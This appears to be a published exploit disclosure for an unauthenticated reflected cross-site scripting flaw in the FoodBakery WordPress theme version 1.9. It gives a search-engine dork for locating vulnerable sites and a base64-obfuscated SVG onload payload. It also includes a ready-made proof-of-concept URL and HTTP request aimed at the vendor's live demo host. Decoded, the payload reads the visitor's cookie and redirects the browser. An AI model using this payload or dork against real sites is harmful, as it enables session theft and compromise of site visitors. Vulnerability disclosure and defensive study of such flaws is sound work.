FoodBakery | Food Delivery Restaurant Directory WordPress Theme v1.9

[+] Exploit Title: FoodBakery | Food Delivery Restaurant Directory WordPress Theme v1.9 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/foodbakery/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 1.9
[+] Software Link: https://themeforest.net/item/food-bakery-restaurant-bakery-responsive-wordpress-theme/18970331
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the FoodBakery theme through 1.9 for WordPress.



### [ Payload: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>



### [ PoC: ]

[!] http://foodbakery.chimpgroup.com/homev1/listings/?search_title=&location=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&foodbakery_locations_position=filter&search_type=custom

[!] GET /homev1/listings/?search_title=&location=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&foodbakery_locations_position=filter&search_type=custom HTTP/1.1
Host: foodbakery.chimpgroup.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector